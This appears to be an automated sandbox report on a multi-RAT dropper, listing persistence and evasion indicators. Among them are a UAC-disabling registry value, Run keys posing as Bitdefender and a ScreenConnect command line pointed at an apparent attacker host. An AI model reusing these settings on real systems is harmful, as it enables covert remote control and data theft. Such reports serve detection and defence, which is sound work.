Malware Analysis Report

2025-04-13 20:47

Sample ID 250126-abddbsvldt
Target NewTextDocumentmod.exe.zip
SHA256 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
Tags
xred asyncrat nanocore quasar remcos vidar xworm bot default office04 remotehost roblox executor school system program vm-ku backdoor defense_evasion discovery execution keylogger persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

Threat Level: Known bad

The file NewTextDocumentmod.exe.zip was found to be: Known bad.

Malicious Activity Summary

xred asyncrat nanocore quasar remcos vidar xworm bot default office04 remotehost roblox executor school system program vm-ku backdoor defense_evasion discovery execution keylogger persistence privilege_escalation rat spyware stealer trojan

NanoCore

Quasar payload

Xworm

Detect Vidar Stealer

Xred

Vidar

Xred family

AsyncRat

UAC bypass

Detect Xworm Payload

Remcos family

Remcos

Vidar family

Xworm family

Asyncrat family

Nanocore family

Quasar family

Quasar RAT

Async RAT payload

Adds policy Run key to start application

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Disables Task Manager via registry modification

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks computer location settings

Event Triggered Execution: Component Object Model Hijacking

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Boot or Logon Autostart Execution: Authentication Package

Enumerates processes with tasklist

Drops autorun.inf file

Drops file in Windows directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Modifies registry key

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Modifies registry class

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-26 00:01

Signatures

Xred family

xred

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-26 00:01

Reported

2025-01-26 00:04

Platform

win7-20240903-en

Max time kernel

132s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Remcos

rat remcos

Remcos family

remcos

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Vidar

stealer vidar

Vidar family

vidar

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA10uxErlupkG5x0OI0LD9GgAAAAACAAAAAAAQZgAAAAEAACAAAACf55AjgxQWYDl6hetgPTS1%2bFUPHtkbCi%2b09QRjV2eDIAAAAAAOgAAAAAIAACAAAADWrAOL4BMPtrjaYIBA2Wq%2fVLw2kgJdEtiyEf3xyH%2bIVqAEAAAv%2b5XbAC%2bay6Hh4phaIEZpucD0pi5LDxu8JYopvUVRPfL6%2fnR%2fKy%2bKwEEJIcRikDK%2fHrZj9cLi4ckXIrAXeqJI4RQUyD2n2RB6IgjFBgXQQAylwyOaNvB2wv74WE2GSGS5RW7TDM1RcEEt2%2fio2rPRS%2fzWXldf0vDAGDCXdKr3JMNGNiFG%2bBAlNz7NOHJjHj0f7XIGC27%2bUwWSdijqtMYkzFlYQI7%2b1vvdlIyQlIrUC9Qw%2fEVGE1am1dL2PKuoQMuL5iKM78a%2fsLiJ0462nAixfTAgWoIT%2fMTjvYyY5YIMqbbL3qgODCgY82SNNoGtjCkjbb54VUfvEjGpm9kCRskkQyATanLYCop2i2OQXFBIj6%2bzE4Ad6vmXrTUphfgY%2bkxPIeZSqZschXkFMnSbgwuzwrYJhVZDSk6pVeIjRXzJCEECZIaG2W6fr0RMgBVTJ%2ba%2b7OOhRaUuwOhhs0tRK8HuUGdvvq4uLyJLyi4c0LlhR4om2sc03BYdlgDrh786fTEaJ34zFKcdPqnZ%2bAZjTMEl1fJm6qL3eDDww42VXJ7E0rWdHj2cs6JNXwJhar5p%2fcc1cp8ZmJK5GdpLnbmhv3cBgNRD5dhip8GrWXxN9TZooIZEc38SI%2fVfW9TsyQbQapdwLc%2bI0dmke8FtFWB4QRwGRgJLNAVytKJqEti36YFuhuAD8EXR4GUHN9BzHi0Nkc6sVxuMX1gA38RlbrP7ZINCwXTBhNHWkyNV6BZEfJWCy6mPBYZN7TkVsMFGpzgRDshRrEhzORcim9m3Fig8%2bwZlR9oJ4pXZ2VXckBm1Og5mpJJa7mzZuO9WieVxfeR3JfBcMbMFhLV21nCzoKVFR%2f2546uQAMZJLbwE7T7yZ150DokywDAsGW0RrXEItUPOx6lLMTT4Id5FtDX9A752412V0%2fAJnsyOsN9VdFQC46wXLCuF0yt4jNPOIjpyC4PN9kfcwHaAyye7%2fL6S%2bgn5YcwaE11vpQOrUBUyAS%2bzti%2bRAu6jyQ9VB%2fDemOyMX0m5xnAyYykOcPj8UBqJCfM2IVKwFgxNXBFKFYeFbTCwV8zxTJgnHnxaKvZWrGrl1yHWi1QGnLI2FG3D%2fOlnA5LpVsWrTfUF4sMVbEk%2f%2fFQwZIUzxDV3d5ngX8YmUiGa6%2blLoUL4HEjpoGqY229U5k5Z2V9ekJ4%2f9kxMr6QoHEyPfztw3idsxZMwVM4G6cvhfYV5ViQIVaMGpB0zcxu66YDC4k%2fGx4TKUAzxWp0rIaB2JNrY1K1wHReQfISyng76Qtr%2bakfTPpppKThcJ1DKcihcrpTQKwhCSSLR3S2GkpCfno2mW%2bBmaYA44dv%2f6y0SAlzpYOsReZYbqPzr6ZZPm8xFjCK5aSbV8S9E5Z6LzGBZ0aDuRRFMShOLu9DZ%2f8uWLu47rMzOZnywOjYNT4sDM8u6%2fOs45xNY5VP4nD9S18%2fOr40HRhWsJS43VmNinW%2fL93DBMr2JrO3jtOW%2by0U8RFgPCW41fOlpXCwUpgfEidsv5s6niKUPnZLUAuD1Sm31AJD7BEhEh2SIY3oqC6A9kBDVcF8ooxWqycRrsOldQ%2ff%2fqWaXuEAAAACKUSN5Kh0v1O4kC4Is4FuSvGAdooFKdhtoY2dmnBaiPQ9XIcF9lo%2bgNGhAqZjFhe62I8sjHJXNnQTKW42xXncf&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\access.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\36.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\333.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
